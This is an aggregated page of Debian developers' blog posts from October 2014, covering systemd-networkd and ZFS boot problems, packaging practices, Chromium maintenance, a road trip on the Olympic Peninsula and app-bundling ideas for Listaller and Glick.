Ever since I read about sytemd-networkd being in the making I was looking forward to try it out. I kept watching for the package to appear in Debian, or at least ITP bugs. A few days ago, by accident, I noticed that I already have systemd-networkd on my machine: It is simply shipped with the systemd package!

My previous setup was a combination of ifplugd to detect when I plug or unplug the ethernet cable with a plain DHCP entry in /etc/network/interface. A while ago I was using guessnet to do a static setup depending on where I am, but I don’t need this flexibility any more, so the very simple approach with systemd-networkd is just fine with me. So after stopping ifplugd and

$ cat > /etc/systemd/network/eth.network <<__END__
[Match]
Name=eth0
[Network]
DHCP=yes
__END__
$ systemctl enable systemd-networkd
$ systemctl start systemd-networkd

I was ready to go. Indeed, systemd-networkd, probably due to the integrated dhcp client, felt quite a bit faster than the old setup. And what’s more important (and my main motivation for the switch): It did the right thing when I put it to sleep in my office, unplug it there, go home, plug it in and wake it up. ifplugd failed to detect this change and I often had to manually run ifdown eth0 && ifup eth0; this now works.

But then I was bitten by what I guess some people call the viral nature of systemd: sytemd-networkd would not update /etc/resolve.conf, but rather relies on systemd-resolved. And that requires me to change /etc/resolve.conf to be a symlink to /run/systemd/resolve/resolv.conf. But of course I also use my wireless adapter, which, at that point, was still managed using ifupdown, which would use dhclient which updates /etc/resolve.conf directly.

So I investigated if I can use systemd-networkd also for my wireless account. I am not using NetworkManager or the like, but rather keep wpa_supplicant running in roaming mode, controlled from ifupdown (not sure how that exactly works and what controls what, but it worked). I found out that this setup works just fine with systemd-networkd: I start wpa_supplicant with this service file (which I found in the wpasupplicant repo, but not yet in the Debian package):

[Unit]
Description=WPA supplicant daemon (interface-specific version)
Requires=sys-subsystem-net-devices-%i.device
After=sys-subsystem-net-devices-%i.device

[Service]
Type=simple
ExecStart=/sbin/wpa_supplicant -c/etc/wpa_supplicant/wpa_supplicant-%I.conf -i%I

[Install]
Alias=multi-user.target.wants/wpa_supplicant@%i.service

Then wpa_supplicant will get the interface up and down as it goes, while systemd-networkd, equipped with

[Match]
Name=wlan0
[Network]
DHCP=yes

does the rest.

So suddenly I have a system without /etc/init.d/networking and without ifup. Feels a bit strange, but also makes sense. I still need to migrate how I manage my UMTS modem device to that model.

The only thing that I’m missing so far is a way to trigger actions when the network configuration has changes, like I could with /etc/network/if-up.d/ etc. I want to run things like killall -ALRM tincd and exim -qf. If you know how to do that, please tell me, or answer over at Stack Exchange.

14 October, 2014 07:00PM by Joachim Breitner (mail@joachim-breitner.de)

hackergotchi for Gunnar Wolf

Gunnar Wolf

When Open Access meets the Napster anniversary

Two causally unrelated events which fit in together in the greater scheme of things ;-)

In some areas, the world is better aligning to what we have been seeking for many years. In some, of course, it is not.

In this case, today I found our article on the Network of Digital Repositories for our University, in the Revista Digital Universitaria [en línea] was published. We were invited to prepare an article on this topic because this month's magazine would be devoted to Open Access in Mexico and Latin America — This, because a law was recently passed that makes conditions much more interesting for the nonrestricted publication of academic research. Of course, there is still a long way to go, but this clearly is a step in the right direction.

On the other hand, after a long time of not looking in that direction (even though it's a lovely magazine), I found that this edition of FirstMonday takes as its main topic Napster, 15 years on: Rethinking digital music distribution.

I know that nonrestricted academic publishing via open access and nonauthorized music sharing via Napster are two very different topics. However, there is a continuous push and trend towards considering and accepting open licensing terms, and they are both points in the same struggle. An interesting data point to add is that, although many different free licenses have existed over time, Creative Commons (which gave a lot of visibility and made the discussion within the reach of many content creators) was created in 2001 — 13 years ago today, two years after Napster. And, yes, there are no absolute coincidences.

14 October, 2014 04:58PM by gwolf

hackergotchi for Marco d'Itri

Marco d'Itri

The Italian peering ecosystem

I published the slides of my talk "An introduction to peering in Italy - Interconnections among the Italian networks" that I presented today at the MIX-IT (the Milano internet exchange) technical meeting.

14 October, 2014 04:34PM

October 13, 2014

hackergotchi for Philipp Kern

Philipp Kern

pbuilder and pam_tmpdir

It turns out that my recent woes with pbuilder were all due to libpam-tmpdir being installed (at least two old bug reports exist about this issue: #576425 and #725434). I rather like my private temporary directory that cannot be accessed by other (potential) users on the same system. Previously I used a hook to fix this up by ensuring that the directory actually exists in the chroot, but somehow that recently broke.

A rather crude but working solution seems to be "session required pam_env.so user_readenv=1" in /etc/pam.d/sudo and "TMPDIR=/tmp" in /root/.pam_environment. One could probably skip pam_tmpdir.so for root, but I did not want to start fighting with pam-auth-update as this is in /etc/pam.d/common-session*.

13 October, 2014 10:28PM by Philipp Kern (noreply@blogger.com)

hackergotchi for Konstantinos Margaritis

Konstantinos Margaritis

SIMD optimizations, cont.

A friend of mine told me that I should advertise my passion and know-how about SIMD more, and I decided to follow his advice. Though I am terrible at marketing and even more at personal marketing, I've made an attempt to do just that, advertise the fact that I'm offering SIMD Optimization Services (with emphasis on PowerPC AltiVec/VMX/VSX, and ARM NEON, but I'm ok with SSE as well, the logic is pretty much the same, though the difference(s) are in the details). For this reason I'm offering a free evaluation of your performance critical code (open/closed, able to sign NDAs if needed) to let you know if it's worth optimizing it, what kind of a performance gain you would get and how much it would cost you to get that result.
You can read more here.

13 October, 2014 07:19PM by markos

John Goerzen

Update on the systemd issue

The other day, I wrote about my poor first impressions of systemd in jessie. Here’s an update.

I’d like to start with the things that are good. I found the systemd community to be one of the most helpful in Debian, and #debian-systemd IRC channel to be especially helpful. I was in there for quite some time yesterday, and appreciated the help from many people, especially Michael. This is a nontechnical factor, but is extremely important; this has significantly allayed my concerns about systemd right there.

There are things about the systemd design that impress. The dependency system and configuration system is a lot more flexible than sysvinit. It is also a lot more complicated, and difficult to figure out what’s happening. I am unconvinced of the utility of parallelization of boot to begin with; I rarely reboot any of my Linux systems, desktops or servers, and it seems to introduce needless complexity.

Anyhow, on to the filesystem problem, and a bit of a background. My laptop runs ZFS, which is somewhat similar to btrfs in that it’s a volume manager (like LVM), RAID manager (like md), and filesystem in one. My system runs LVM, and inside LVM, I have two ZFS “pools” (volume groups): one, called rpool, that is unencrypted and holds mainly the operating system; and the other, called crypt, that is stacked atop LUKS. ZFS on Linux doesn’t yet have built-in crypto, which is why LVM is even in the picture here (to separate out the SSD at a level above ZFS to permit parts of it to be encrypted). This is a bit of an antiquated setup for me; as more systems have AES-NI, I’m going to everything except /boot being encrypted.

Anyhow, inside rpool is the / filesystem, /var, and /usr. Inside /crypt is /tmp and /home.

Initially, I tried to just boot it, knowing that systemd is supposed to work with LSB init scripts, and ZFS has init scripts with carefully-planned dependencies. This was evidently not working, perhaps because /lib/systemd/systemd/ It turns out that systemd has a few assumptions that turn out to be less true with ZFS than otherwise. ZFS filesystems are normally not mounted via /etc/fstab; a ZFS pool has internal properties about which dataset gets mounted where (similar to LVM’s actions after a vgscan and vgchange -ay). Even though there are ordering constraints in the units, systemd is writing files to /var before /var gets mounted, resulting in the mount failing (unlike ext4, ZFS by default will reject an attempt to mount over a non-empty directory). Partly this due to the debian-fixup.service, and partly it is due to systemd reacting to udev items like backlight.

This problem was eventually worked around by doing zfs set mountpoint=legacy rpool/var, and then adding a line to fstab (“rpool/var /var zfs defaults 0 2″) for /var and its descendent filesystems.

This left the problem of /tmp; again, it wasn’t getting mounted soon enough. In this case, it required crypttab to be processed first, and there seem to be a lot of bugs in the crypttab processing in systemd (more on that below). I eventually worked around that by adding After=cryptsetup.target to the zfs-import-cache.service file. For /tmp, it did NOT work to put it in /etc/fstab, because then it tried to mount it before starting cryptsetup for some reason. It probably didn’t help that the system’s cryptdisks.service is a symlink to /dev/null, a fact I didn’t realize until after a lot of needless reboots.

Anyhow, one thing I stumbled across was poor console control with systemd. On numerous occasions, I had things like two cryptsetup processes trying to read a password, plus an emergency mode console trying to do so. I had this memorable line of text at one point:

(or type Control-D to continue): Please enter passphrase for disk athena-crypttank (crypt)! [ OK ] Stopped Emergency Shell.

And here we venture into unsatisfying territory with systemd. One answer to this in IRC was to install plymouth, which apparently serializes console I/O. However, plymouth is “an attractive boot animation in place of the text messages that normally get shown.” I don’t want an “attractive boot animation”. Nevertheless, neither systemd-sysv nor cryptsetup depends on plymouth, so by default, the prompt for a password at boot is obscured by various other text.

Worse, plymouth doesn’t support serial consoles, so at the moment booting a system that uses LUKS with systemd over a serial console is a matter of blind luck of typing the right password at the right time.

In the end, though, the system booted and after a few more tweaks, the backlight buttons do their thing again. Whew!

Update 2014-10-13: uau pointed out that Plymouth is more than a bootsplash, and can work with serial consoles, despite the description of the package. I stand corrected on that. (It is still the case, however, that packages don’t depend on it where they should, and the default experience for people using cryptsetup is not very good.)

13 October, 2014 05:46PM by John Goerzen

hackergotchi for Steve McIntyre

Steve McIntyre

Successful Summer of Code in Linaro

It's past time I wrote about how Linaro's students fared in this year's Google Summer of Code. You might remember me posting earlier in the year when we welcomed our students. We started with 3 student projects at the beginning of the summer. One of the students unfortunately didn't work out, but the other two were hugely successful.

Gaurav Minocha was a graduate student at the University of British Columbia, Vancouver, Canada. He worked on Linux Flattened Device Tree Self-checking, mentored by Grant Likely from Linaro's Office of the CTO. Gaurav achieved all of his project's goals, and he was invited to Linaro's recent Linaro Connect USAConnect conference in California to meet people and and talk about his project. He and Grant presented a session on their work; it was filmed, and video is online. Grant said he was very happy with Gaurav's "strong, solid performance" during the project.

Varad Gautam was a student at Birla Institute of Technology and Science, Pilani, India. He succeeded in porting UEFI to the BeagleBone Black. Leif Lindholm from the Linaro Enterprise Group was his mentor for the summer. At the end of the summer, Varad delivered a UEFI port ready for booting Linux and his code was included in Linaro's September UEFI release. Leif said that he was "very pleased with Varad's self sufficiency and ability to pick up an entirely new software project very quickly". We were hoping to invite Gaurad to Connect in California also, but travel document delays got in the way. With luck we'll see him at the next Connect in Hong Kong in February 2015.

Well done, guys! It was great to work with these young developers for the summer, and we wish them lots more success in their future endeavours.

Google have also just confirmed that they will be running the Summer of Code program again in 2015. I'm hoping that Linaro will be accepted again next year as a mentoring organisation. I'll post more about that early next year.

13 October, 2014 05:06PM

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

Seinfeld streak at GitHub

Early last year, I referred to a Seinfeld Streak in a blog post referring to almost two months of updates to the Rcpp Gallery. This is sometimes called Jerry Seinfeld's secret to productivity: Just keep at it. Don't break the streak.

I now have different streak:

github activity october 2013 to october 2014

Now we'll see how far this one will go.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

13 October, 2014 12:23AM

October 12, 2014

Jonathan Wiltshire

Clean builds for the win

I’ve just spent a little time squashing several bugs on the trot, all the same: insufficient build-dependencies when built in a clean environment. Typically this means that the package was uploaded after being built on a developer’s normal machine, which already has everything required installed.

It’s long been the case that we have several ways to build packages in a clean chroot before upload, which reveals these sorts of errors and more. There’s not really any excuse for uploading packages that fail to build in this way.

Please, for the sanity of everyone working with the archive, don’t upload packages that haven’t been built in a clean environment. It’s such a waste of everybody’s time if you don’t do this most basic of checks.


Clean builds for the win is a post from: jwiltshire.org.uk | Flattr

12 October, 2014 08:50PM by Jon

hackergotchi for Steinar H. Gunderson

Steinar H. Gunderson

Short SSH keys

I'm sure this is useful for something beyond being neat:

klump:~> cat .ssh/id_ed25519.pub
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIFePWUlZmVbCZ9KHa4pOOMBXHaMFeuuIZDw0uHHEY2/m sesse@klump

I hope OpenSSH doesn't eventually grow a sort-of single point of failure in “djb ALL the algorithms!” by default, though.

12 October, 2014 07:47PM

Iustin Pop

Day trip on the Olympic Peninsula

Day trip on the Olympic Peninsula

TL;DR: drove many kilometres on very nice roads, took lots of pictures, saw sunshine and fog and clouds, an angry ocean and a calm one, a quiet lake and lots and lots of trees: a very well spent day. Pictures at http://photos.k1024.org/Daytrips/Olympic-Peninsula-2014/.

Sometimes I travel to the US on business, and as such I've been a few times in the Seattle area. Until this summer, when I had my last trip there, I was content to spend any extra days (weekend or such) just visiting Seattle itself, or shopping (I can spend hours in the REI store!), or working on my laptop in the hotel.

This summer though, I thought - I should do something a bit different. Not too much, but still - no sense in wasting both days of the weekend. So I thought maybe driving to Mount Rainier, or something like that.

On the Wednesday of my first week in Kirkland, as I was preparing my drive to the mountain, I made the mistake of scrolling the map westwards, and I saw for the first time the Olympic Peninsula; furthermore, I was zoomed in enough that I saw there was a small road right up to the north-west corner. Intrigued, I zoomed further and learned about Cape Flattery (“the northwestern-most point of the contiguous United States!”), so after spending a bit time reading about it, I was determined to go there.

Easier said than done - from Kirkland, it's a 4h 40m drive (according to Google Maps), so it would be a full day on the road. I was thinking of maybe spending the night somewhere on the peninsula then, in order to actually explore the area a bit, but from Wednesday to Saturday it was a too short notice - all hotels that seemed OK-ish were fully booked. I spent some time trying to find something, even not directly on my way, but I failed to find any room.

What I did manage to do though, is to learn a bit about the area, and to realise that there's a nice loop around the whole peninsula - the 104 from Kirkland up to where it meets the 101N on the eastern side, then take the 101 all the way to Port Angeles, Lake Crescent, near Lake Pleasant, then south toward Forks, crossing the Hoh river, down to Ruby Beach, down along the coast, crossing the Queets River, east toward Lake Quinault, south toward Aberdeen, then east towards Olympia and back out of the wilderness, into the highway network and back to Kirkland. This looked like an awesome road trip, but it is as long as it sounds - around 8 hours (continuous) drive, though skipping Cape Flattery. Well, I said to myself, something to keep in mind for a future trip to this area, with a night in between. I was still planning to go just to Cape Flattery and back, without realising at that point that this trip was actually longer (as you drive on smaller, lower-speed roads).

Preparing my route, I read about the queues at the Edmonds-Kingston ferry, so I was planning to wake up early on the weekend, go to Cape Flattery, and go right back (maybe stop by Lake Crescent).

Saturday comes, I - of course - sleep longer than my trip schedule said, and start the day in a somewhat cloudy weather, driving north from my hotel on Simonds Road, which was quite nicer than the usual East-West or North-South roads in this area. The weather was becoming nicer, however as I was nearing the ferry terminal and the traffic was getting denser, I started suspecting that I'll spend a quite a bit of time waiting to board the ferry.

And unfortunately so it was (photo altered to hide some personal information):

Waiting for the ferry.

The weather at least was nice, so I tried to enjoy it and simply observe the crowd - people were looking forward to a weekend relaxing, so nobody seemed annoyed by the wait. After almost half an hour, time to get on the ferry - my first time on a ferry in US, yay! But it was quite the same as in Europe, just that the ship was much larger.

Once I secured the car, I went up deck, and was very surprised to be treated with some excellent views:

Harbour view Looking towards the sun… … and away from it

The crossing was not very short, but it seemed so, because of the view, the sun, the water and the wind. Soon we were nearing the other shore; also, see how well panorama software deals with waves :P!

Near the other shore

And I was finally on the "real" part of the trip.

The road was quite interesting. Taking the 104 North, crossing the "Hood Canal Floating Bridge" (my, what a boring name), then finally joining the 101 North. The environment was quite varied, from bare plains and hills, to wooded areas, to quite dense forests, then into inhabited areas - quite a long stretch of human presence, from the Sequim Bay to Port Angeles.

Port Angeles surprised me: it had nice views of the ocean, and an interesting port (a few big ships), but it was much smaller than I expected. The 101 crosses it, and in less than 10 minutes or so it was already over. I expected something nicer, based on the name, but… Anyway, onwards!

Soon I was at a crossroads and had to decide: I could either follow the 101, crossing the Elwha River and then to Lake Crescent, then go north on the 113/112, or go right off 101 onto 112, and follow it until close to my goal. I took the 112, because on the map it looked "nicer", and closer to the shore.

Well, the road itself was nice, but quite narrow and twisty here and there, and there was some annoying traffic, so I didn't enjoy this segment very much. At least it had the very interesting property (to me) that whenever I got closer to the ocean, the sun suddenly disappeared, and I was finding myself in the fog:

Foggy road

So my plan to drive nicely along the coast failed. At one point, there was even heavy smoke (not fog!), and I wondered for a moment how safe was to drive out there in the wilderness (there were other cars though, so I was not alone).

Only quite a bit later, close to Neah Bay, did I finally see the ocean: I saw a small parking spot, stopped, and crossing a small line of trees I found myself in a small cove? bay? In any case, I had the impression I stepped out of the daily life in the city and out into the far far wilderness:

Dead trees on the beach Trees growing on a rock Small panorama of the cove

There was a couple, sitting on chairs, just enjoying the view. I felt very much intruding, behaving like I did as a tourist: running in, taking pictures, etc., so I tried at least to be quiet ☺. I then quickly moved on, since I still had some road ahead of me.

Soon I entered Neah Bay, and was surprised to see once more blue, and even more blue. I'm a sucker for blue, whether sky blue or sea blue ☺, so I took a few more pictures (watch out for the evil fog in the second one):

View towards Neah Bay port Sea view from Neah Bay

Well, the town had some event, and there were lots of people, so I just drove on, now on the last stretch towards the cape. The road here was also very interesting, yet another environment - I was driving on Cape Flattery Road, which cuts across the tip of the peninsula (quite narrow here) along the Waatch River and through its flooding plains (at least this is how it looked to me). Then it finally starts going up through the dense forest, until it reaches the parking lot, and from there, one goes on foot towards the cape. It's a very easy and nice walk (not a hike), and the sun was shining very nicely through the trees:

Sunny forest Sun shinning down Wooden path

But as I reached the peak of the walk, and started descending towards the coast, I was surprised, yet again, by fog:

Ugly fog again!

I realised that probably this means the cape is fully in fog, so I won't have any chance to enjoy the view.

Boy, was I wrong! There are three viewpoints on the cape, and at each one I was just "wow" and "aah" at the view. Even thought it was not a sunny summer view, and there was no blue in sight, the combination between the fog (which was hiding the horizon and even the closer islands), the angry ocean which was throwing wave after wave at the shore, making a loud noise, and the fact that even this seemingly inhospitable area was just teeming with life, was both unexpected and awesome. I took here waay to many pictures, here are just a couple inlined:

First view at the cape Birds 'enjoying' the weather Foggy shore

I spent around half an hour here, just enjoying the rawness of nature. It was so amazing to see life encroaching on each bit of land, even though it was not what I would consider a nice place. Ah, how we see everything through our own eyes!

The walk back was through fog again, and at one point it switched over back to sunny. Driving back on the same road was quite different, knowing what lies at its end. On this side, the road had some parking spots, so I managed to stop and take a picture - even though this area was much less wild, it still has that “outdoors” flavour, at least for me:

Waatch River

Back in Neah Bay, I stopped to eat. I had a place in mind from TripAdvisor, and indeed - I was able to get a custom order pizza at "Linda's Woodfired Kitchen". Quite good, and I ate without hurry, looking at the people walking outside, as they were coming back from the fair or event that was taking place.

While eating, a somewhat disturbing thought was going through my mind. It was still early, around two to half past two, so if I went straight back to Kirkland I would be early at the hotel. But it was also early enough that I could - in theory at least - still do the "big round-trip". I was still rummaging the thought as I left…

On the drive back I passed once more near Sekiu, Washington, which is a very small place but the map tells me it even has an airport! Fun, and the view was quite nice (a bit of blue before the sea is swallowed by the fog):

Sekiu view

After passing Sekiu and Clallam Bay, the 112 curves inland and goes on a bit until you are at the crossroads: to the left the 112 continues, back the same way I came; to the right, it's the 113, going south until it meets the 101. I looked left - remembering the not-so-nice road back, I looked south - where a very appealing, early afternoon sun was beckoning - so I said, let's take the long way home!

It's just a short stretch on the 113, and then you're on the 101. The 101 is a very nice road, wide enough, and it goes through very very nice areas. Here, west to south-west of the Olympic Mountains, it's a very different atmosphere from the 112/101 that I drove on in the morning; much warmer colours, a bit different tree types (I think), and more flat. I soon passed through Forks, which is one of the places I looked at when searching for hotels. I did so without any knowledge of the town itself (its wikipedia page is quite drab), so imagine my surprise when a month later I learned from a colleague that this is actually a very important place for vampire-book fans. Oh my, and I didn't even stop! This town also had some event, so I just drove on, enjoying the (mostly empty) road.

My next planned waypoint was Ruby Beach, and I was looking forward to relaxing a bit under the warm sun - the drive was excellent, weather perfect, so I was watching the distance countdown on my Garmin. At two miles out, the "Near waypoint Ruby Beach" message appeared, and two seconds later the sun went out. What the… I was hoping this is something temporary, but as I slowly drove the remaining mile I couldn't believe my eyes that I was, yet again, finding myself in the fog…

I park the car, thinking that asking for a refund would at least allow me to feel better - but it was I who planned the trip! So I resigned myself, thinking that possibly this beach is another special location that is always in the fog. However, getting near the beach it was clear that it was not so - some people were still in their bathing suits, just getting dressed, so… it seems I was just unlucky with regards to timing. However, I the beach itself was nice, even in the fog (I later saw online sunny pictures, and it is quite beautiful), the the lush trees reach almost to the shore, and the way the rocks are “sitting” on the beach:

A lonely dinghy Driftwood… and human construction People on the beach

Since the weather was not that nice, I took a few more pictures, then headed back and started driving again. I was soo happy that the weather didn't clear at the 2 mile mark (it was not just Ruby Beach!), but alas - it cleared as soon as the 101 turns left and leaves the shore, as it crosses the Queets river. Driving towards my next planned stop was again a nice drive in the afternoon sun, so I think it simply was not a sunny day on the Pacific shore. Maybe seas and oceans have something to do with fog and clouds ☺! In Switzerland, I'm very happy when I see fog, since it's a somewhat rare event (and seeing mountains disappearing in the fog is nice, since it gives the impression of a wider space). After this day, I was a bit fed up with fog for a while ☺…

Along the 101 one reaches Lake Quinault, which seemed pretty nice on the map, and driving a bit along the lake - a local symbol, the "World's largest spruce tree". I don't know what a spruce tree is, but I like trees, so I was planning to go there, weather allowing. And the weather did cooperate, except that the tree was not so imposing as I thought! In any case, I was glad to stretch my legs a bit:

Path to largest spruce tree Largest spruce tree, far view Largest spruce tree, closer view Very short path back to the road

However, the most interesting thing here in Quinault was not this tree, but rather - the quiet little town and the view on the lake, in the late afternoon sun:

Quinault Quinault Lake view

The entire town was very very quiet, and the sun shining down on the lake gave an even stronger sense of tranquillity. No wind, not many noises that tell of human presence, just a few, and an overall sense of peace. It was quite the opposite of the Cape Flattery… and a very nice way to end the trip.

Well, almost end - I still had a bit of driving ahead. Starting from Quinault, driving back and entering the 101, driving down to Aberdeen:

Afternoon ride

then turning east towards Olympia, and back onto the highways.

As to Aberdeen and Olympia, I just drove through, so I couldn't make any impression of them. The old harbour and the rusted things in Aberdeen were a bit interesting, but the day was late so I didn't stop.

And since the day shouldn't end without any surprises, during the last profile change between walking and driving in Quinault, my GPS decided to reset its active maps list and I ended up with all maps activated. This usually is not a problem, at least if you follow a pre-calculated route, but I did trigger recalculation as I restarted my driving, so the Montana was trying to decide on which map to route me - between the Garmin North America map and the Open StreeMap one, the result was that it never understood which road I was on. It always said "Drive to I5", even though I was on I5. Anyway, thanks to road signs, and no thanks to "just this evening ramp closures", I was able to arrive safely at my hotel.

Overall, a very successful, if long trip: around 725 kilometres, 10h:30m moving, 13h:30m total:

Track picture

There were many individual good parts, but the overall think about this road trip was that I was able to experience lots of different environments of the peninsula on the same day, and that overall it's a very very nice area.

The downside was that I was in a rush, without being able to actually stop and enjoy the locations I visited. And there's still so much to see! A two nights trip sound just about right, with some long hikes in the rain forest, and afternoons spent on a lake somewhere.

Another not so optimal part was that I only had my "travel" camera (a Nikon 1 series camera, with a small sensor), which was a bit overwhelmed here and there by the situation. It was fortunate that the light was more or less good, but looking back at the pictures, how I wish that I had my "serious" DSLR…

So, that means I have two reasons to go back! Not too soon though, since Mount Rainier is also a good location to visit ☺.

If the pictures didn't bore you yet, the entire gallery is on my smugmug site. In any case, thanks for reading!

12 October, 2014 05:53PM

Giuseppe Iuculano

apt-get purge chromium

As you may know, I was the Debian chromium maintainer for many years. Some week ago, I decided to stop working  in the chromium package because it is not possible anymore to contribute and work in the team. In fact, Michael Gilbert started to work in a manner that prevent people to help maintain the package.

In the last period the git repository rarely was updated, and my requests were systematically  ignored. Having an updated git repository is mandatory in a big package like Chromium,  and if you don’t push your changes, other people will lost their time

Now, after deciding to stop maintaining Chromium, I also decided to purge it and switch to the Google Chrome binary. Why? Chromium is a pain. Huge commits not documented in changelog that caused stupid bugs because no one can double check them.

In this moment we have an unusable [1] [2] [3] version of Chromium in testing because maintainer demoted grave bugs with the recommendation to rm -rf ./config/chromium … and nobody can understand the sense of latest commits.

flattr this!

12 October, 2014 04:10PM by Giuseppe

hackergotchi for Mario Lang

Mario Lang

soundCLI works again

I recently ranted about my frustration with GStreamer in a SoundCloud command-line client written in Ruby.

Well, it turns out that there was quite a bit confusion going on. I still haven't figured out why my initial tries resulted in an error regarding $DISPLAY not being set. But now that I have played a bit with gst-launch-1.0, I can positively confirm that this was very likely not the fault of GStreamer.

THe actual issue is, that ruby-gstreamer is assuming gstreamer-1.0, while soundCLI was still written against the gstreamer-0.10 API.

Since the ruby gst module doesn't have the Gstreamer API version in its name, and since Ruby is a dynamic language that only detects most errors at runtime, this led to all sorts of cascaded errors.

It turns out I only had to correct the use of query_position, query_duration, and get_state, as well as switching from playbin2 to playbin.

soundCLI is now running in the background and playing my SoundCloud stream. A pull request against soundCLI has also been opened.

On a somewhat related note, I found a GCC bug (ICE SIGSEGV) this weekend. My first one. It is related to C++11 bracketed initializers. Given that I have heard GCC 5.0 aims to remove the experimental nature of C++11 (and maybe also C++14), this seems like a good time to hit this one. I guess that means I should finally isolate the C++ regex (runtime) segfault I recently stumbled across.

12 October, 2014 01:30PM by Mario Lang

hackergotchi for Guido Günther

Guido Günther

Testing a NetworkManager VPN plugin password dialog

Testing the password dialog of a NetworkManager VPN plugin is as simple as:

echo -e 'DATA_KEY=foo\nDATA_VAL=bar\nDONE\nQUIT\n' | ./auth-dialog/nm-iodine-auth-dialog -n test -u $(uuid) -i

The above is for the iodine plugin when run from the built source tree. This allows one to test these dialogs although one didn't see them since ages since GNOME shell uses the external UI mode to query for the password.

This blog is flattr enabled.

12 October, 2014 11:55AM

John Goerzen

First impressions of systemd, and they’re not good

Well, I finally bit the bullet. My laptop, which runs jessie, got dist-upgraded for the first time in a few months. My brightness keys stopped working, and it no longer would suspend to RAM when the lid was closed, and upon chasing things down from XFCE to policykit, eventually it appears that suddenly major parts of the desktop breaks without systemd in jessie. Sigh.

So apt-get install systemd-sysv (and watch sysvinit-core get uninstalled) and reboot.

Only, my system doesn’t come back up. In fact, over several hours of trying to make it boot with systemd, it failed in numerous spectacular and hilarious (or, would be hilarious if my laptop would boot) ways. I had text obliterating the cryptsetup password prompt almost every time. Sometimes there were two processes trying to read a cryptsetup password at once. Sometimes a process was trying to read that while another one was trying to read an emergency shell password. Many times it tried to write to /var and /tmp before they were mounted, meaning they *wouldn’t* mount because there was stuff there.

I noticed it not doing much with ZFS, complaining of a dependency loop between zfs-mount and $local-fs. I fixed that, but it still wouldn’t boot. In fact, it simply hung after writing something about wall passwords.

I’ve dug into systemd, finding a “unit generator for fstab” (whatever the hack that is, it’s not at all made clear by systemd-fstab-generator(8)).

In some cases, there’s info in journalctl, but if I can’t even get to an emergency mode prompt, the practice of hiding all stdout and stderr output is not all that pleasant.

I remember thinking “what’s all the flaming about?” systemd wasn’t my first choice (I always thought “if it ain’t broke, don’t fix it” about sysvinit), but basically ignored the thousands of messages, thinking whatever happens, jessie will still boot.

Now I’m not so sure. Even if the thing boots out of the box, it seems like the boot process with systemd is colossally fragile.

For now, at least zfs rollback can undo upgrades to 800 packages in about 2 seconds. But I can’t stay at some early jessie checkpoint forever.

Have we made a vast mistake that can’t be undone? (If things like even *brightness keys* now require systemd…)

12 October, 2014 03:18AM by John Goerzen

October 11, 2014

hackergotchi for Dirk Eddelbuettel

Dirk Eddelbuettel

RPushbullet 0.1.0 with a lot more awesome

A new release 0.1.0 of the RPushbullet package (interfacing the neat Pushbullet service) landed on CRAN today.

It brings a number of goodies relative to the first release 0.0.2 of a few months ago:

  • pushing of files is now supported thanks to a nice pull request bu Mike Birdgeneau
  • a default device can be designated in the ~/.rpushbullet.json file or options
  • initialization has been rewritten to use recpients which can be indices, device names or, if missing entirely, the (new) default device
  • alternatively, email is supported as another recipient option in which case the Pushbullet service will send an email to the give address
  • pbGetDevices() now returns a proper S3 object with corresponding print() and summary() methods
  • the documentation regarding package initialization, and setting of key, devices, etc has been expanded
  • more examples has been added to the documentation
  • various minor cleanups, fixes, corrections throughout

There is a whole boat load of more wickedness in the Pushbullet API so if anybody feels compelled to add it, fire off pull requests at GitHub.

More details about the package are at the RPushbullet webpage and the RPushbullet GitHub repo.

Courtesy of CRANberries, there is also a diffstat report for this release.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

11 October, 2014 03:29AM

October 10, 2014

Matthias Klumpp

Listaller + Glick: Some new ideas

As you might know, due to invasive changes in PackageKit, I am currently rewriting the 3rd-party application installer Listaller. Since I am not the only one looking at the 3rd-party app-installation issue (there is a larger effort going on at GNOME, based on Lennarts ideas), it makes sense to redesign some concepts of Listaller.

Currently, dependencies and applications are installed into directories in /opt, and Listaller contains some logic to make applications find dependencies, and to talk to the package manager to install missing things. This has some drawbacks, like the need to install an application before using it, the need for applications to be relocatable, and application-installations being non-atomic.

Glick2

There is/was another 3rd-party app installer approach on the GNOME side, by Alexander Larsson, called Glick2. Glick uses application bundles (do you remember Klik from back in the days?) mounted via FUSE. This allows some neat features, like atomic installations and software upgrades, no need for relocatable apps and no need to install the application.

However, it also has disadvantages. Quoting the introduction document for Glick2:

“Bundling isn’t perfect, there are some well known disadvantages. Increased disk footprint is one, although current storage space size makes this not such a big issues. Another problem is with security (or bugfix) updates in bundled libraries. With bundled libraries its much harder to upgrade a single library, as you need to find and upgrade each app that uses it. Better tooling and upgrader support can lessen the impact of this, but not completely eliminate it.”

This is what Listaller does better, since it was designed to do a large effort to avoid duplication of code.

Also, currently Glick doesn’t have support for updates and software-repositories, which Listaller had.

Combining Listaller and Glick ideas

So, why not combine the ideas of Listaller and Glick? In order to have Glick share resources, the system needs to know which shared resources are available. This is not possible if there is one huge Glick bundle containing all of the application’s dependencies. So I modularized Glick bundles to contain just one software component, which is e.g. GTK+ or Qt, GStreamer or could even be a larger framework (e.g. “GNOME 3.14 Platform”). These components are identified using AppStream XML metadata, which allows them to be installed from the distributor’s software repositories as well, if that is wanted.

If you now want to deploy your application, you first create a Glick bundle for it. Then, in a second step, you bundle your application bundle with it’s dependencies in one larger tarball, which can also be GPG signed and can contain additional metadata.

The resulting “metabundle” will look like this:

glick-libundle

 

 

 

 

 

 

 

 

 

This doesn’t look like we share resources yet, right? The dependencies are still bundled with the application requiring them. The trick lies in the “installation” step: While the application above can be executed right away without installing it, there will also be an option to install it. For the user, this will mean that the application shows up in GNOME-Shell’s overview or KDEs Plasma launcher, gets properly registered with mimetypes and is – if installed for all users – available system-wide.

Technically, this will mean that the application’s main bundle is extracted and moved to a special location on the file system, so are the dependency-bundles. If bundles already exist, they will not be installed again, and the new application will simply use the existing software. Since the bundles contain information about their dependencies, the system is able to determine which software is needed and which can simply be deleted from the installation directories.

If the application is started now, the bundles are combined and mounted, so the application can see the libraries it depends on.

Additionally, this concept allows secure updates of applications and shared resources. The bundle metadata contains an URL which points to a bundle repository. If new versions are released, the system’s auto-updater can automatically pick these up and install them – this means e.g. the Qt bundle will receive security updates, even if the developer who shipped it with his/her app didn’t think of updating it.

